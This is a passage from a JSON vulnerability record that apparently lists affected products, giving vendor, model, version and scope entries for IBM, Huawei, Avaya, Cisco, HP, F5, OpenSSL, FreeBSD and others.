"eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "icewall sso certd r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v110.1" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7080" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "9.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "88704.76.0" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0.6" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cognos planning fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x7080" }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "blackberry link", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "1.2" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "stunnel", "scope": "ne", "trust": 0.3, "vendor": "stunnel", "version": "5.02" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025308" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.99" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.9" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "85704.76.0" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.3" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus foundations start", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 